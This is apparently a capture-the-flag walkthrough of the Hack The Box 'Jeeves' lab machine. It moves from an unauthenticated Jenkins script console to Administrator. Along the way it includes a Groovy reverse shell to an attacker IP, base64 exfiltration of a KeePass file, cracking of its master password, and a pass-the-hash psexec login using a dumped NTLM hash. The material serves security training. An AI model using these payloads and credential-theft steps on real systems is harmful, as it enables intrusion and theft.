> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-jeeves.md).

# HTB - Jeeves

## Enumeration and Foothold

### NMAP

```bash
┌──(ajay㉿kali)-[~]
└─$ nmap -sV -v -A 10.129.4.63  
Starting Nmap 7.98 ( <https://nmap.org> ) at 2026-05-24 21:42 -0400
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Ask Jeeves
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 11 (86%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.005 days (since Sun May 24 21:36:14 2026)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
```

### HTTP - 80

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXlnkR7jVE1IpfOxWCZHS%2Fimage.png?alt=media&amp;token=f36f60fa-17e2-4b05-b2d3-9e86e07ae508" alt=""><figcaption></figcaption></figure>

The website has a search feature. But upon searching for anything results in an error.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYdV7NJsftYGOe6F4ODW1%2Fimage.png?alt=media&amp;token=2f448909-df53-4b21-a96f-a99da268fccc" alt=""><figcaption></figcaption></figure>

The backend is running Microsoft SQL Server (MSSQL) 2005.

No hidden directories or vhosts found.

### HTTP - 50000

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9vcvp0lQEt5lRG9ENKbg%2Fimage.png?alt=media&amp;token=b0936016-e574-4719-bebd-e2d0dc352bfd" alt=""><figcaption></figcaption></figure>

The page says `Powered by Jetty:// 9.4.z-SNAPSHOT` and gives a 404 because the root directory (`/`) doesn't have an index page.

Eclipse Jetty is a lightweight, highly scalable, Java-based web server and Servlet engine. Jetty's goal is to support web protocols (HTTP/1, HTTP/2, HTTP/3, WebSocket, etc.) in a high volume low latency way that provides maximum performance while retaining the ease of use and compatibility with years of Servlet development. Jetty is a modern fully asynchronous web server that has a long history as a component oriented technology, and can be easily embedded into applications while still offering a solid traditional distribution for webapp deployment.

Directory enumeration revealed a hidden directory

```bash
──(ajay㉿kali)-[~]
└─$ gobuster dir -u <http://10.129.4.63:50000> -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.tx
2026/05/24 22:29:41 wordlist file "/usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.tx" does not exist: stat /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.tx: no such file or directory
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ gobuster dir -u <http://10.129.4.63:50000> -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     <http://10.129.4.63:50000>
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
askjeeves            (Status: 302) [Size: 0] [--> <http://10.129.4.63:50000/askjeeves/>]
```

Upon visiting the page it runs a Jenkins server.

### Exploiting Jenkins to get RCE

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaanfGziKFhb3V0XqJycQ%2Fimage.png?alt=media&amp;token=502b8b70-d848-46fb-aee0-7bac7d85a5c4" alt=""><figcaption></figcaption></figure>

The script console allows us to run arbitrary Groovy scripts within the Jenkins controller runtime. This can be abused to run operating system commands on the underlying server. Jenkins is often installed in the context of the root or SYSTEM account, so it can be an easy win for us.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnR2aP2LmTDsLAg0D6gPB%2Fimage.png?alt=media&amp;token=03606078-93b4-421d-aa15-64b15950c325" alt=""><figcaption></figcaption></figure>

Running the below command gives us a reverse shell as kohsuke.

```bash
String host="10.10.15.170";
int port=1234;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};s.close();p.destroy();
```

## Shell as Kohsuke

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4hJoxZY6YzHQVDuI3OXp%2Fimage.png?alt=media&amp;token=55ea83b7-b6cd-4eb8-af67-e5ce01a8efdc" alt=""><figcaption></figcaption></figure>

Grab the user flag at `kohsuke` user desktop directory

Enumerating the user directories found a .kdbx file(Kee-Pass Database) in the users Documents directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwQpxthqLImRRZNhsBUCK%2Fimage.png?alt=media&amp;token=85872d01-9900-44d7-b885-9acb976620bc" alt=""><figcaption></figcaption></figure>

### Transferring File through bas64 encode

```bash
C:\Users\kohsuke\Documents>powershell -c "[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\Users\kohsuke\Documents\CEH.kdbx'))"
powershell -c "[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\Users\kohsuke\Documents\CEH.kdbx'))"
A9mimmf7S7UBAAMAAhAAMcHy5r9xQ1C+WAUhavxa/wMEAAEAAAAEIAAa9AXMAPl53bm7OHxFlPzqL9AaagdXwADhhz88cZQdPQUgADhp/jV/8tfbFVXMZo0dYGsd+vArnbomIcvp7LY8ekCRBggAcBcAAAAAAAAHEAA5PJe+r9ioINuRQqapTwP2CCAAWZ4wEPE4riv5v4Uh9MRMleBMc2lD741lgyqIZvdKF5gJIAC3N2a2HmVjUcOsoCgvFhdREDHwFWCJtsVkfeRnGXL8/woEAAIAAAAABAANCg0Ky0CdvA+mYPz/pPHMifcotoJU20MaIewzKYthL+ZH20iSyupN0WzVd3n56kgupOMXNbuM7E+YnejgMO3DkhxMaG6uIFi77zQ11k1FoijlIw2do7ruxk0juAgEIZnNmJof6q1Ruy3/yKNzB3p5u1HD8J/rVfr+dYCFqtNfpoE6tjuNHPxj3n9MD+NW6Zee4etTD77kyqvn/EnJvJ7kK4x9mDHI6WmWzsFnG0L5P2zTkip7oluwKaMTOVW8aAAVXJ/cmdANqBPOhq0hS+Eq3tZ3/b1mcPLR3YQ2wCzLob3uk217jy/UP1tyb3SASI45izno1EoOtW5Nd6ZfQaPMnH2bcGTH0Fn0gVSyqQGyWaE7aCnikFifEepYfxntoftwl3GLn3dn7l4WGfIdazyhiwBl6NOvqyqhS81hyt+qxlLcv+INb34xqlTne0Opjdc9BRr0HkG0jSFwpdnXqp5wBtp7R49vnqyT0dKsJIDxVOKQee98pR7updF8uTIHaOVSUbW/YAqgJuyLBOAtagnEmX1S26297uA7Pu0Z2wayJoMS7TylVlkbzJDm8xcfUPp7TKCz9Eg+lZrniSUqOeb6fqb+EJxlfslFvOWNGsi69Eh40wWaqRcvAnkpH4Q5Mt/n52jC7qIFUJc0A8CaaATWf6ZuYIb3hjni9W6Et1Q7r6oL90Ov3SMrRe1Lh6YKCR8f1hgGLotVnEkd5+xYqNzBrD13iZ0HMlSEID1fltM4sY7UKIvEIqtv0WRnlxawMgZnAEIvwgMWxeTHul7bONWbCzt1T5aRRkzGS824sTxrdM5xTflaaFUACejV/KD0ubnleP80TRnEW81Vr2vQwIAuHmWU7oFKVDWIsEV8tzqp68ckJORx8fCSB7A1q5NyyPOwkXuWAeqExPMk25Oegyg5m8+D9eQ+3i6jliy+0aF7EVlRzBHmsdV3F9qz9Mqu6BIx8j7EvOsIgox1EX99siEvU5+44wBfEZiK0kyGX6gokdiMTpmwlZFjnBIRF5MRTaxX5/O7u3hzaO+bVWHj4mkswWdkrO0TTjIKVoWWcIgcwcQADCRUM0UxOOAlUm3xJz7d/qeuLGDJ4Z8S2EVJXLL6C4e1zcyMAUWuc3jy/WzooWRvJpbXNeDwORhm35cwg0A7MwQvOYqMMDW9PZlD17mKUs3QryFwc96ihtoDruiozHAD0LLWW7b7TqkP7652T32VA5AG+gCL2pW6N0l9EpZhDroYKakpTjPzm+nUhNvqq3Oh0cRTrusp2GocwAk3H3hngPYMOT+CutTn1/2a2OuicfGa4TQSQfsMJWxs4rN5AoshcOez+jnB6/LJpL1dR5P3W2DFBvocoFGzCGBcCths6exlG/ylMdNcgPYeqGeDQg7KYGzdOdhq32qR5PfVygbU4NbnMDKMJIYyNzRM3j7EjAju0xG4UoOydDzmvJMIVKT6V4RrchD+aEcauZZNVeOEDC8RYD6dIqsFsLxsCgmTQJp3VD9a/O7Z0Tp51pUi9LRc+4AXroP4KAoHstxPfdfp+bsEH1cDxZ1TfLC3vpxgQH/CC0nPJV93SQILAIz9G1Ciz9qbHBkDrc+WZ44I5mGP3c83RTm5zRxqf20PL+gazsYbj0EIeufYEs7TJIke9fgEHVYYpMGftHJC0b0m0rNE7bTfLGcSjDkezCIV9WT3WmJJddKs+n/7mFeRfw1k9pKyYfFD6TWSAGRyr9SGvD+Qu5OtEU1KIr+YAU0r8BEmCXQfjBcGkrMoEDhLNM0O1hVZLKN2r5F5yYDzYD3nAxUOQO6FllNB6rrtzciLtgX9RG722Fm1iRUyN98E4W7WqueW/lFDhxiyGxDQRORL93iA1WdsrHEqoJjx3qUzu+9BQCGF3s4WnOH4QsRsIApFNtSs+r0iQePP7k0cbAjRHBLKcYa+AooreTTRj5H3+0l8LDdRIVdxQ93P9F10RNIVR+I0+iKpjCHXVezT71dNkEr6ozWCYLn5KqL4MGyW2OmP2p5FJTn18WS9Vz2qdxZ3tfaIAKagF2wWwy6TnbU4rQYcQBbEr4dzK39tJaLej5iI4/D3FLfSh+9weN1EcZfzNNdciCns14ZLjZ1Q1XyptWBOk6i4/8B1xisZUhaY3zR+Ksns9fQCLAtvNRvdEgWWjVSIJW9x5N7YmhWGa8Uwr+zDSlM1kaWHmDmTDAGglBwWuxZE6vA1RKgUYXfIqNeoVfTFuyJlKEemQ0dV2NnWKeeE7b3W1Q+KZGlIEl13LYtROjuBDmInppbizk1cIZZqoDKzRohz1Nzo5mJoEIUaQ4bkInh4xMWBFuxXzIuwTaPWAZRXzgt4GoKEm12fq6J5YnBuVXeHk86cHomcyZKXpetnwgUYMcfipalHz8qKSqlFxoXQr0K0GRY2j6OObr3650uCUsltXjdC1l3haVdZShfYpRl9VR8IhUKr9LjWp0gxn1YY2MPMFZ/YnF2SqAZqPv/oxJAUcFqFIC8xXCIK2CtEZoQfmi62PeAbVVVGVzHL4p7C30LQfb8V1i5JsdhXeLPYdCj8EojQ+kqH/6ruxI4agM7keCHjeJQYmvg1PY4apw8WiSRazWUcN05NhMC5LFtUzgixJPirxRx6OsmO5eWxA6Zhm5pJqtH9PLNJHrS+yb9U/DWpTMCDr21JiOcOIcWJFJhqZXOXNQ+HiiktcwFPBSrxuZQLE+uhjXSiNmZGVQQ87RQdNvW4NPandat4hmQIudM0RB8QiarDJa8EURBo7vc6iucOxO4wRREnSf/krqAhr4be6ZJ7CUL2dUft1nDbT7TzbDlJ+0ghQyBAgAUof7wp2Gb/cd9M07AzMKvwakN9YGmIaVVs/AqMQ1pWy+YG+1DDX9h5/QUTmcYNm2U8ac7B0r+n7lau5FXu/IWGJOyxMr1IHgrZFCaBJ3U5egalYmZ05Nnwsr7uqJZZsHNDDqbgdMcKRoioAcwDcq++wevnVicp09luBvancTF6H34VVzQP+T7a6W8LySzkUxAzK42ms8qB6oUsDWI1D/sVnUPy+PqeSqO2zbQ6ZkjfJVqAhio4VisE9ZPBYKGsEIqBp0U7eUmySsDZ1J2D371o9sV0RVQb+RLmkhvTgAV8lvthvAVDfRc0TfNVdl53jQZpzLUQEfiB+IPDubQASwjZ0zPTupL6CViaVShCf1KnybiC+yZCp+oU7SveDNCQ8yUNN0QYnjIpiMsUcOpTyMrFyeYWRkUtDSSvcat1zO1M64nlxv7KSbV42JieNxh8lJa9NPltlEQBZ9awGRPfHQtOhi8HM3c1mNmvGEg8DjCHLjyez8Zhqt4cqGymK8yAduULZA7tLq8SH9IIE81eU51lfg6hNx/F3fr8nODYvn0yhUCbIfoIg0v9+CsNoDlvdKClCl9e4Mr4wyXoDJe6zL9Bk1GHvt323gOW7jawZ1x29Pv/Eu0vdHpgr7IcnKhMWlXGEbuxX9fjH7NTQeB5oH716Qt1U7MxXi+Zg3KwSv5e2yOjvcw=

```

```bash
──(ajay㉿kali)-[~]
└─$ echo "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" | base64 -d > CEH.kdbx
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ ls
'=0.13.0'  '=0.6.1'  'Blood Creds'   CEH.kdbx   Desktop   Documents   Downloads   go   hash.txt 
```

### Cracking password hash for keepass database

```bash
┌──(ajay㉿kali)-[~]
└─$ keepass2john CEH.kdbx > keepass.hash
```

```bash
┌──(ajay㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt keepass.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)     
1g 0:00:01:35 DONE (2026-05-24 23:19) 0.01048g/s 576.6p/s 576.6c/s 576.6C/s nando1..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
```

### Accessing the Kee-Pass Database

```bash
┌──(ajay㉿kali)-[~]
└─$ kpcli --kdb=CEH.kdbx                                         
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/>
```

```bash
kpcli:/> ls
=== Groups ===
CEH/
kpcli:/> cd CEH
kpcli:/CEH> dir
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Windows/
=== Entries ===
0. Backup stuff                                                           
1. Bank of America                                   www.bankofamerica.com
2. DC Recovery PW                                                         
3. EC-Council                               www.eccouncil.org/programs/cer
4. It's a secret                                 localhost:8180/secret.jsp
5. Jenkins admin                                            localhost:8080
6. Keys to the kingdom                                                    
7. Walmart.com                                             www.walmart.com

kpcli:/CEH> show -f "Keys to the kingdom"

 Path: /CEH/
Title: Keys to the kingdom
Uname: bob
 Pass: lCEUnYPjNfIuPZSzOySA
  URL: 
Notes: 

kpcli:/CEH> show -f "Backup stuff"

 Path: /CEH/
Title: Backup stuff
Uname: ?
 Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
  URL: 
Notes: 

kpcli:/CEH> 
```

Leaked hashes `aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00`

we can try using it against Administrator. Bob user doesnt exist on the machine.

## Shell as Administrator

```bash
┌──(ajay㉿kali)-[~]
└─$ impacket-psexec Administrator@10.129.4.63 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.129.4.63.....
[*] Found writable share ADMIN$
[*] Uploading file wxwuIhIr.exe
[*] Opening SVCManager on 10.129.4.63.....
[*] Creating service OITt on 10.129.4.63.....
[*] Starting service OITt.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32> 

```

```bash
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,637,107,200 bytes free

C:\Users\Administrator\Desktop> more hm.txt
The flag is elsewhere.  Look deeper.

C:\Users\Administrator\Desktop> 

```

### Enumerating Windows Hidden Streams

```bash
C:\Users\Administrator\Desktop> dir /R
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,636,980,224 bytes free

C:\Users\Administrator\Desktop> 
```

```powershell
C:\Users\Administrator\Desktop> powershell -c "Get-Content hm.txt -Stream root.txt"
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-jeeves.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
